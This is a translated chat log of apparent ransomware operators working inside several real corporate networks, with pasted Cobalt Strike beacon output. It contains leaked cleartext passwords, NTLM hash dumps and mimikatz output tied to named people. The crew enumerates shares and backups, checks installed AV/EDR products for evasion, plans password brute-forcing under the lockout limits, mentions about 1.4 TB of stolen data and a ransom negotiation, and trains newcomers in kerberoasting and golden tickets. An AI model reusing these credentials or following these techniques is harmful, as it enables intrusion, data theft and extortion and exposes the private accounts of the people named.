Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/,8/28/2017 11:22:05 AM,13148410925787355,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.opentable.com/,https://www.opentable.com/,2/7/2017 3:51:28 PM,13130977888943168,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login 
Data,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,android://OrDksZTeY8ETlesJhBbFVR5KTnBdNkWQ5Rxr1jC3Ac3IfK3DjmDoQnD696F2RbgyDhHen6KuHKtDv3rv0LYZBA==@com.safetyculture.iauditor/,12/31/1600 6:00:00 PM,0,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,android://Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient/,12/31/1600 6:00:00 PM,0,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway1578930554.zendesk.com/,https://waterway1578930554.zendesk.com/auth/v2/login/signin,1/15/2020 10:05:51 AM,13223577951113149,gkeller@waterway.com,GKoct2015! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://app.hotschedules.com/,https://app.hotschedules.com/hs/login.jsp,3/2/2020 12:41:12 PM,13227648072628460,2120689,1534603 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.coach.com/,https://www.coach.com/,4/28/2020 1:34:44 PM,13232572484452463,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:3000/,http://localhost:3000/,4/29/2020 12:31:19 PM,13232655079442330,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://wwng-stage-ui.azurewebsites.net/,https://wwng-stage-ui.azurewebsites.net/,5/4/2020 12:29:24 PM,13233086964594837,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://onenote.officeapps.live.com/,https://onenote.officeapps.live.com/,5/26/2020 1:35:43 PM,13234991743323159,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login 
Data,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,android://sYsSllycB0V7gxpC4P7xYw9xD8SF41a-b_d5oxxl-E8RHZ9FH7IRXMMMfWPlrkMWPfdYSHz8fzvC0NguZ54U8w==@com.robinhood.android/,12/31/1600 6:00:00 PM,0,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaycarwash.monday.com/,https://waterwaycarwash.monday.com/,9/28/2020 2:16:42 PM,13245794202143373,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.facebook.com/,https://www.facebook.com/,9/28/2020 4:47:40 PM,13245803260898448,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://lastpass.com/,https://lastpass.com/,10/8/2020 8:47:08 AM,13246638428429684,,
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.mockflow.com/,https://www.mockflow.com/,11/9/2020 5:04:30 PM,13249436670654041,gkeller@waterway.com,Waterway99
```
`http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2`
no, we'll get everything ready now and then we can close it
```
--- Chromium Credential (User: gkeller) ---
URL      : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
--- Chromium Credential (User: gkeller) ---
URL      : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W
--- Chromium Credential (User: gkeller) ---
URL      : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://github.com/session
Username : gkellerww
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://smartscan.controlscan.com/security/login
Username : 65000001503764
Password : u7i2jwPWZdfCwcU
--- Chromium Credential (User: gkeller) ---
URL      : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!
--- Chromium Credential (User: gkeller) ---
URL      : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99
```
do you have a lot left to do here?
`\\GKELLER\G$\WW2k1\IT\SolarwindsBackups`
`\\GKELLER\G$\Backup`
in short, here
```
Teemo[PDIPRODWEB]SYSTEM */728|20Dec26 20:50:43> shell net view \\DRB2 /all
[*] Tasked beacon to run: net view \\DRB2 /all
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \\DRB2

Share name   Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$       Disk           Remote Admin
Archive      Disk
Backup       Disk
C$           Disk           Default share
E$           Disk           Default share
Install      Disk
IPC$         IPC            Remote
Log          Disk
MailMerge    Disk
Media        Disk
Replication  Disk
SiteWatch    Disk
The command completed successfully.
```

```
\\DRB2\Archives
\\DRB2\Backup
\\DRB2\Replication
```
more backups
```
GKELLER.WATERWAY.COM
MIKEP16.WATERWAY.COM
BLAUERPC.WATERWAY.COM
U06NEWOFFICEPC.WATERWAY.COM
MHARPERNEW.WATERWAY.COM
```
user3
@tl1 add @user3 here please
`SYSTEM *@192.168.0.222 (WWDC2)`
did it land?
I'll pass waterway now
nope
waterway?
I didn't even get to check the DC
won't work, it died
repdot.com
give me the session password
if there's no note there
this one
francedc1
and check the DC
yeah, thx
nice work, ok I'll finish it off now
will you finish off the leftovers on rt?
so that's what's needed
filled up one and a half TB
that's how it is
`4405 File(s) 1,452,604,853,672 bytes`
sly fox)
how?
AV - bitdefender
veeam - veeam_admin a313f6cf5fb92a96195435f9a6e4b5a9
still figuring out the hypervisor
found a way to hop between boxes so the AV doesn't act up (no idea whether it's very noisy or not)
av, veeam, etc.
well, we got it about the backups)
what do we have here?
`\\BLAUERPC\D$` backups
now that's something
`bdredline.exe` I missed it
```
[+] Determining what EDR products are installed on wwdc2...
[+] gzflt.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] BitDefender Found!
```
if the admin had removed them by hand, all the sessions would have dropped because of the domain being blacklisted
it monitors activity and alerts
it's not an AV tool though
so, monitoring
`Solarwinds` is monitoring, something like EDR
what did the query say
tried to hop to a box and the AV ate the dll, although when I looked at the tasklist I didn't notice anything like that there
a whole 7
that's for myself, I found the hv
what's that?
```
Shared resources at \\WWSQL2
My business server

Share name            Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                Disk           Remote Admin
barcode               Disk
C$                    Disk           Default share
CertEnroll            Disk           Active Directory Certificate Services share
Company               Disk           Company
E$                    Disk           Default share
F$                    Disk           Default share
File History Backups  Disk
Folder Redirection    Disk           Folder Redirection
FTP                   Disk
G$                    Disk           Default share
IPC$                  IPC            Remote IPC
Shared Folders        Disk
TrackIt               Disk
Users                 Disk           Users
```
```
Server Name            Remark
-------------------------------------------------------------------------------
\\ANDREWNEW
\\BLAUERPC             BLauerPC
\\CATHYDESKTOP
\\CATHYNEW
\\CBUSERPC
\\CSTORENEW
\\DANIELLEMOYNE
\\DAVESOFFICEPC
\\DJARDEN
\\DJBROWNXPS
\\DRB2
\\GKELLER
\\HENERYSNEWPC
\\ITPROGRAMS
\\IWASH99
\\JAMIENEW
\\KANTRELLNEW
\\KEVINPC
\\LAB-OFFICE
\\LOYALTYTEST
\\LWINSTON
\\MACMINI-EDC269       Waterway's Mac mini
\\MARKETINGNEW
\\MELISSASNEWPC
\\MHARPERNEW
\\MIKEGNEWPC
\\MISSYSNEWPC
\\MORNINGREPORTPC
\\MUNGERPC
\\MWEISSDESKTOP
\\MWITKOWSKINEW
\\NEWPCFORSOMEONE
\\NTWKMTRPC
\\PDIPRODSQL
\\PDIPRODWEB
\\RECRUITINGNEW
\\REPORTING
\\STEPHANIENEW
\\STEVENEW
\\TIFFANYSNEWPC
\\TRAININGPCSTL
\\TSHERIDANNEWPC
\\WW2K1
\\WWDC1
\\WWDC2
\\WWHV01
\\WWHV02
\\WWHV03
\\WWHV04
\\WWSQL
\\WWSQL2               My business server
```
:frowning2:
-
```
Task SvcRestartTask#31841 2/4/2021 3:40:16 PM Ready
```
Tried to bring the persistence down again, check
```
CORP.TELEVISA.COM.MX 10.254.0.116 SYSTEM * CORPKLHLRSD01
```
tuxomibo.com pings up to level 3
kalarada.com doesn't ping up to 3, only 1
ah, then it makes sense to brute
found the hash today
and did you have it from the start?
+
alive?
it's a total mess of domain ones there
checked, there's only one there
```
* Username : ctxdbadmin
* Domain   : CORP
* NTLM     : 7106c947d3a8abbea16cb5448f4ac00a
```
and then into brute)
check their access first
start with the domain ones
there are both domain and local ones
and the LAs there are domain users?))))
the main thing, don't confuse password incorrect and access denied
yes, in progress
and check on the other servers
but take LA on the servers you can reach
strange
and it went into lockout?
and it went into lockout right away
no, 1
did you try 19 times?
I'll check
```
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          120
Minimum password length:                              12
Length of password history maintained:                6
Lockout threshold:                                    20
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        BACKUP
The command completed successfully.
```
give net accounts too
with their hashes
take LA on the servers
well, don't touch it then
ah, okay
I didn't try the hash a second time, apparently lockout on it is set to 1 attempt, I'll lock it again
at the same time
plus I'd check this hash against those in the Servicio Basico group and the Domain Admins group
```
Responsible: Jose Juan Muniz Mendoza. Person in charge 2: Adrián Ruíz Mondragon
```
I'd look at who these two are, and if they're important, check the hash on them
the hash doesn't work either?
well, the session is hanging with the old password
seize the moment)
yes
did they enable it?
new LAs all over the place, Administrator is different almost everywhere
```
* Username : ES050616C
* Domain   : CORP
* NTLM     : b7f8b9d8041930f6daed7cb3fb20c6d3
```
after I poked at the DC))))
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    ES050616C
Full Name                    Servicio ES050616C
Comment                      CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza.
                             Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code          (null)
Account active               Locked
Account expires              Never

Password last set            2/4/2021 1:06:21 PM
Password expires             6/4/2021 1:06:21 PM
Password changeable          2/5/2021 1:06:21 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/27/2021 10:13:01 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
The command completed successfully.
```
10 minutes later
```
beacon> shell net user ES050616C /dom
[*] Tasked beacon to run: net user ES050616C /dom
[+] host called home, sent: 54 bytes
[+] received output:
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name                    ES050616C
Full Name                    Servicio ES050616C
Comment                      CORP - 4337626 - Alta 13/02/2019 - Responsible: Jose Juan Muniz Mendoza.
                             Person in charge 2: Adrián Ruíz Mondragon
User's comment
Country/region code          (null)
Account active               Yes
Account expires              Never

Password last set            2/4/2021 1:23:14 PM
Password expires             6/4/2021 1:23:14 PM
Password changeable          2/5/2021 1:23:14 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/27/2021 10:13:01 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Servicio Basico      *Domain Users
                             *User_PSO             *Domain Admins
The command completed successfully.
```
and net user on him
please show what the login is of this DA whose hash it was
and new local admins?(
and now september1
nope(
like august1
maybe there's a seasonal pass there
check
no cleartext, didn't check on cmd5
cleartext?
7
there is
and is there a hash?
anyway, there are a couple of boxes where DAs went, need to monitor them
got a bit out of the user segment of servers, found a server with a DA session, but it's been hanging there since August and the password was changed long ago(
no movement here?
```
CORP\aloar Televisa.2021
CORP\gadiazc Soyelnumero0000001
CORP\kigarciap:::e0d8d7fcb35d2ef4920964532118f4f3:::
CORP\aftapiam:::0246bdc62f0e2c396384b592ef3be354:::
CORP\rsolanobau:::9d057d6ae0251a7c6d0674b26c9aa75c:::
CORP\Vmorenov:::a5bcd1c15d403fbf5c792c66f202e622:::
CORP\jccanoa:::78b75076afd20b0c1765db06e49c9715:::
CORP\clmendozav:::c933798f947972ca9d08ba805008d6ca:::
CORP\evazquezpr:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Gcastillom:::2441d700356f3ab1d0714db1e9844e60:::
CORP\cagiront:::749ceaca0433d984e0b78c7599a42886:::
CORP\cihernandeza:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\Csegovia:::4efa1df1fdfb9a4ffbda0d00e840ede2:::
CORP\Jrivass:::30fe4ab34ce80404f75465fb1b8cb12a:::
CORP\jrortizc:::fff70ea26ce69ae4c02bdce9ef8a4f61:::
CORP\ndjesusg:::34f21309ef327ecd9a852cfb510f4e6d:::
CORP\prangell:::4c07f34762110fa682bd0c6ef54e010d:::
CORP\iperezj:::f651f76a6a087c44698d7741b69c8fa3:::
CORP\Mfremontp:::c4f89225237628041d2303a26ee14007:::
CORP\cmgarciaa:::2029d906714ba0e913d30998533c9063:::
CORP\lgtoledol:::fe2969a54e98a468459022084143e1ec:::
CORP\jvelazquezg:::956e44f5069e8f0161ea7064840894ff:::
CORP\Aventuraj:::5d1dd74b6aeba7121e9324b1285d3739:::
CORP\Fmartinezg:::d9e8da2bb0bf67e9d076f09e29b26a1a:::
CORP\aloar:::4affd6e3e410086d3118d4dfa2ff931a:::
CORP\rcervantesm:::afd011d72ad1a55831d75f33be36d105:::
CORP\Jgonzalezv:::bec80eaa1dcee1f870dfc02808aa1afb:::
CORP\iaguilarr:::4548dea50cdb68bb9e206e4ac758edf3:::
CORP\crayonrod:::9675375a5bd161cd3ca09b9da344b372:::
CORP\jbarrerame:::587ddf743d86b13146415c77106686cf:::
CORP\jmpuentesc:::f93291f941f5387b4dde806e44970a62:::
CORP\chhbautistar:::ecb44fba43525518fd81fbf4453d650b:::
CORP\ammezar:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\gadiazc:::0e4c74096d9998c7a537509f481ee9da:::
CORP\sicabreram:::80537e6fc5a1f37f6ea4b0210af893c5:::
CORP\legutierrezg:::8a40ed074d59774f020fca6ac58d44d5:::
CORP\aafloresga:::986c69e34ac0935fcd39130ff05ad035:::
CORP\vigomezar:::6003c2feccf5eda3bdd18e373885524b:::
CORP\gemorenop:::288c03a4543cf46d0a665df89f1b8a3d:::
CORP\eamunozc:::decb62a34748b1dbbfc29124b545cfbc:::
CORP\gafloresso:::cac5c182593a480a05ba20a4e3b197a5:::
CORP\vperezg:::2e8b36ddd8932fa1bf97fa477d5bc565:::
CORP\jorget_wipro:::6460ac17a883c93ed07db8434ddc3f03:::
FILIAL\bmramirezs:::28ccd6f27c8c92346957931f94a1075d:::
FILIAL\pvhernandeza:::8aab1daa12e415eb9a9ad3cbf1692d71:::
FILIAL\Anavarretea:::5cb20c880326791e424fc9f2554ae9b4:::
FILIAL\RociodelaLuzC:::2f4b6c1b63ab9540eb7e087bc0cc2e61:::
```
pcsb.org - the conf please
@user3 has a VPN in work, you can join him
+
yes
in the sense of helping?
to support)
this goes where?
if they update the VPN configs today, I'll hand it out for work
for now move over to support
the lady went home, apparently...
+
sorted it out?
injector update
sort out the update
yes
is there a new cob?
me
1 person needed
add to the chat
or into `CORPSFECRT04` if it becomes available
in short, if the VPN is on we jump straight into `CORPKIOVDAPGM01`
installed
posted it above
give shellcode
televisa landed
Long lunch
yeah, I ran to the pharmacy) after the delivery, so to speak, straight for activated charcoal
I'm here
came to work, had lunch and went home)
had lunch...
everyone suddenly left)
yeah, damn)
@user7 went for a smoke
I'm alone here))
then @user7 give shellcode
to the store, apparently
I can issue 1 cob as a replacement
for how long?
he stepped out
@user9 was it only your cob that died yesterday?
mine is already filthy...
seems only voodoo
which cobs took part in the lock yesterday?
give shellcode
will there be some later?
for now
nothing extra to issue(
running it again
a miss for everyone?
do it through the old design
I'll go through the whole list now and report back
some crap
+
@user7 VPN too
@user3 I'll issue a VPN for work
so, we have 2 people with nothing to do?
and I'll set up inveigh, though I haven't decided where yet
still trying to determine who the admin is, to settle whether they use outsourcing or not
and what's in sccy besides monitoring?
user4 is in sccy, monitoring is there too; I'm only in snu
I'm in sccy
what are the others busy with?
@user9 in snu and sccy
so, about today
hmm, I don't remember, I'll check whether there are any sql servers there at all
sql sploits?
yes, I checked everything there, no vulns: ms17, net_api, smbghost, rdp exploits
sccy monitoring, snu.edu what's left to check there?
about your current ones, is there really anything to do there?
nope, went in and checked the note, but nothing more
heard nothing from skytech? I have one session from there, no DC, nothing pings
there's a VPN snu.edu
sccy from the active ones
Which one?
I have a VPN issued to you, but I don't see any info about it
Ask
and I have a couple of questions for you
go ahead))
At minimum, have a coffee
well, what are the current tasks?
didn't get it
you're the one with no work right now?)
I assume on the way
and where is everyone?
hi
Hi all
It's hanging
`wb.zhangna:Zhangna123`
net accounts))
```
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           2
Lockout observation window (minutes):                 2
Computer role:                                        WORKSTATION
The command completed successfully.
```
DC
```
Domain Controllers:

Server Name  IP Address
-----------  ----------
HZ-DC03      10.246.3.33
HZ-DC04      10.246.3.34
BJ-DC03      10.238.8.100
BJ-DC04      10.238.0.100
HZ-EQDC08    10.246.101.34
HZ-EQDC07    10.246.101.33
```
```
Authentication Id : 0 ; 554893 (000000:0008778d)
Session           : Interactive from 1
User Name         : wb.zhangna
Domain            : CN
Logon Server      : HZ-EQDC08
Logon Time        : 2020/10/26 23:27:44
SID               : S-1-5-21-1380817616-3362833225-652976467-106526
        msv :
         [00000003] Primary
         * Username : wb.zhangna
         * Domain   : CN
         * NTLM     : 985de1088d5d619c783802e87d1dfea1
         * SHA1     : 89d60fa07d36dc39fbf2f516b74514db08e25b38
         * DPAPI    : c5af9cdc18387afefdc1024f86b99ed1
        tspkg :
        wdigest :
         * Username : wb.zhangna
         * Domain   : CN
         * Password : (null)
kerberos : * Username : wb.zhangna * Domain : CN.NET.NTES * Password : (null) ssp : credman: Authentication Id: 0; 553900 (000000:000873ac) Session : Interactive from 1 User Name : wb.zhangna Domain : CN Logon Server : HZ-EQDC08 Logon Time : 2020/10/26 23:27:44 SID : S-1-5-21-1380817616-3362833225-652976467-106526 msv : [00000003] Primary * Username : wb.zhangna * Domain : CN * NTLM : 985de1088d5d619c783802e87d1dfea1 * SHA1 : 89d60fa07d36dc39fbf2f516b74514db08e25b38 * DPAPI: c5af9cdc18387afefdc1024f86b99ed1 tspkg : wdigest: * Username : wb.zhangna * Domain : CN * Password : (null) kerberos : * Username : wb.zhangna * Domain : CN.NET.NTES * Password : (null) ssp : credman: Authentication Id: 0; 92375 (000000:000168d7) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2020/10/26 23:27:37 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : HIH-D-22925 * Domain : CN * NTLM : 3909fbffc2df0e29ce348893f4a18b95 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a tspkg: wdigest: * Username : HIH-D-22925 * Domain : CN * Password : (null) kerberos : * Username : HIH-D-22925$ * Domain : cn.net.ntes * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21 ssp : CREDMAN: Authentication Id: 0; 92331 (000000:000168ab) Session : Interactive from 1 User Name : 
DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2020/10/26 23:27:37 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : HIH-D-22925 * Domain : CN * NTLM : 3909fbffc2df0e29ce348893f4a18b95 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a tspkg: wdigest: * Username : HIH-D-22925 * Domain : CN * Password : (null) kerberos : * Username : HIH-D-22925$ * Domain : cn.net.ntes * Password : 54 61 54 9d f0 e4 49 b0 67 2d 94 27 d7 d3 6e 8a 7f 52 05 c7 e7 c6 e3 76 68 02 b4 7e e7 37 65 34 a7 c6 8f 0f c6 44 05 40 9d 48 0a a6 89 d4 c8 48 ca 3e 99 95 e4 ad dc 2b c8 7d 15 29 83 20 68 5e f5 d6 39 76 bd 7e c1 97 65 55 a9 b1 73 59 37 e1 53 e5 35 17 2a 1f 2e 74 05 6b 57 96 ac 61 ce 76 74 c8 f0 53 ca 26 8c 7e 30 1e 70 03 5e a0 0f a4 7c 31 4c e7 4e c7 54 8c d6 4b 35 52 e7 6e ea eb 80 a4 9d 16 36 50 26 c2 a3 40 d5 9f 0b 6b b0 41 42 d8 41 0c aa c2 d7 78 32 60 79 04 82 ce 7e 5e 53 e2 89 68 d3 37 0e 53 9b 9d 4a 59 c8 c6 32 c3 34 49 72 3c 8c 5e 63 0c cc 88 65 eb 2c c0 6f e1 51 b3 01 20 ab 33 9c 0a 97 b3 be b8 c2 76 21 cd 3a 4d 63 0e 3f 6d 64 9f 00 69 33 54 b0 4f a7 ca 2e dc 17 34 23 81 db c0 ae 52 94 b0 5f b5 e9 21 ssp : CREDMAN: Authentication Id: 0; 996 (000000:000003e4) Session : Service from 0 User Name : HIH-D-22925 Domain : CN Logon Server : (null) Logon Time : 2020/10/26 23:27:36 SID : S-1-5-20 msv : [00000003] Primary * Username : HIH-D-22925 * Domain : CN * NTLM : 3909fbffc2df0e29ce348893f4a18b95 * SHA1 : 9d1bc75d9c64519e6a1d925aa105bad3633e6d0a tspkg: wdigest: * Username : HIH-D-22925 * Domain : CN * Password : (null) kerberos : * Username : hih-d-22925$ * Domain : CN.NET.NTES * Password : (null) ssp : credman: Authentication Id: 0; 997 (000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2020/10/26 23:27:36 SID : S-1-5-19 msv : tspkg: wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman: 
DA
```
这项请求将在域 cn.net.ntes 的域控制器处理。
组名 Domain Admins
注释 指定的域管理员
成员
-------------------------------------------------------------------------------
B6823 cnadmin H10151 luot ntes.cn sileiy winbjplan
命令成功完成。
```
Then I don't understand what the problem is)
They count
Lab/dedicated server don't count?
We don't have Windows, and?
It's a Windows one, after all
this thing here, https://github.com/quasar/Quasar
ok, then take Empire for testing))
tested the toolkit))
No.
No
and which ones were/are there?
Which ones @tl1
Hi
what about the tasks?
pt
Hi
Hi all
I'm up
```
┌─[input0@parrot]─[~]
└─╼ $ping helpdocpt.club
PING helpdocpt.club (162.0.237.18) 56(84) bytes of data.
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=1 ttl=52 time=206 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=2 ttl=52 time=207 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=3 ttl=52 time=208 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=4 ttl=52 time=414 ms
64 bytes from impecunious-polder.vpsrdns.web-hosting.com (162.0.237.18): icmp_seq=5 ttl=52 time=207 ms
```
yep
is the forum domain down?
hi
oh hi
good evening
:space_invader:
hahaha
yeah, looks like the feds won't let them pay(
hahahaha
```
jana dare: what in the hell (49 seconds ago)
Support: Hello, are you ready to negotiate? (47 seconds ago)
jana dare: fuck off
```
judging by the screenshot in general
I don't know)
they wrote to the feds
is this the healthcare one?
04 yes
they came to your account, you're user04, right?
your guys?
night
ok, good night)
yep)
and I'll pass it on to Tar)
run adusers through the script, put it in an archive and send it here
to launch
copy; I don't understand at all what's going on, I can only do the simplest actions
yes, and that wasn't a question
or*
no questions)
so, any more questions? can I go?
it'll all be there within a day
ok then upload it to a file sharer, well, screw it, I'll drop the link with the password here
up to 100 MB as far as I know
no limit on size?
and uploading files here works fine, right?
when I get back I'll pass it to Tar
drop it in off here
heh, I've been sitting here for a day already too
I'll send you the archive, ok? since Tar is silent
and I'm already dying)
okay
yep, I'll sit for now and do another batch with your parser of what can be reopened
+ the rest?
+++
Does everyone have personal cobs?
:thumbsup:
find DA and we'll move on from there
the next couple of hours
+
for now we're working with matches
+
I'm back
bon appetit
we'll continue in half an hour
okay
half an hour
okay, how long?
an hour?
more likely yes than no)
snack)
they didn't tell us about lunches these two days
so, are you on lunch?
not yet
more questions?
you take the krbtgt hash and make yourself a ticket for any DA and you're set)
N time has passed, maybe even the next day, and all the DAs have changed their passwords
you took a hash dump from the DC
here's the thing
including from DA
2) it lets you make a token from any user))
1) if you pulled the krbtgt hash, then the DC itself has already been dumped) I haven't seen cases where a file `krbtgt hash (do not read).txt` would be lying on the disk somewhere
also a good question
and if we pulled the krbtgt user's hash we can make a golden ticket, what can be done with it?
same as with ntlm hashes, you throw it in the chat and get the pass
as soon as I got the pass I passed it on to you right away
emeralmatherials.com
here
here was the kerb
```
$EPM.LOCAL$MSSQLSvc/SDCEPMVMQAPV02.EPM.LOCAL*$:Fujitsu2012
```
because the pass is too serious and brute won't crack it)
here are the domains in the archive, we took kerberos, but we managed to finish without it, that's all about non-identicality, okay. Situation: there's only a kerberos hash, what to do with it? Where to knock?
already a better question
ok, counter question: what's the point of pulling kerberos hashes if we've never used them once?
you don't have help on the modules?
no git?
yes, knowledge about vectors and what can and can't be done
you're given useful modules, your task is to study them, document them, test them, use them in practice
you should be doing that
the task is something else
I can write up everything about every module
if you don't study the modules you're given, then what's the point?
https://cisoclub.ru/kerberoasting/
maybe you'll tell us?
in more detail: what hashes, from where, whose, how did they get there, why aren't they the same everywhere, etc.
it gives output to the console
you could also write "it gives output to the console")
it collects hashes from memory, like everything else, basically
just by the way, how does invoke-kerberoast work?
and also, the better you know how the network itself works together with Active Directory, the better your understanding of what can be done in it
we only give you the basics, to show that this can be done, but it isn't always required
the better you reason in the context of the task of the whole vector
so the more you train doing uac bypass, finding modules for your tasks on git yourself, reading guides, etc.
like everything else, basically
that's only cured by experience)
inattentiveness
sometimes you poke 3-6 times hoping it'll change
you don't read the command output
can we then add more tools to our arsenal during lunch? we'll sit and study some over lunch
from what I saw
well, even take a game walkthrough as an example: in some Zelda you can't solve a puzzle, you watch a walkthrough on youtube and you've already moved on; only here it's with analysis, listening to the reasoning, picking up some tricks from an "experienced hand"
and then we'll go over the new material
after lunch, more questions for a couple of hours
you can leave for now then
it wasn't discussed
is your lunch shifted by an hour?
or are you leaving?
the same enumeration of modules based on the conditions of the starting environment, just faster because the hand is trained)
2-5) first look for analogs of the command on the same git in a c# .net application, then third-party modules that can be imported, and as a last resort download this module to your dedicated server, take the source file and move it by hand into the modules folder on the target machine, perform the needed actions, clean up after yourself
the differences are clear, it's just incredibly interesting to watch a walkthrough of at least one network right in field conditions with reasoning, not like everyone on the internet on their own lab without a hitch
2-3) build an exe version yourself and run it there
more questions?
because you haven't gone further than PE, but today we will
already on lp there can be differences, at the UAC stage for example, at the stage of domain disconnection
in the EA context there was no experience at all
by the way, yes, it really would be extremely interesting to see how someone more professional than us works
the sessions aren't identical, the actions are identical*
obviously not identical, but the algorithm in different contexts is roughly the same: low priv - collect what's available; LA/System - mimi and other more serious things; DA - apart from dcsync we haven't used anything. Just for the contexts the actions are essentially identical; maybe we're not working the way we should, or maybe that's how it is
well, it's clear that situations vary, and still
we're not expanding the arsenal, methods, and structuring with you for nothing
somewhere the AV will kick you out after 5 minutes of any activity, etc.
somewhere none of the modules will work at all
somewhere you can brute a kerberoast in 10 minutes
you do understand that sessions are far from identical
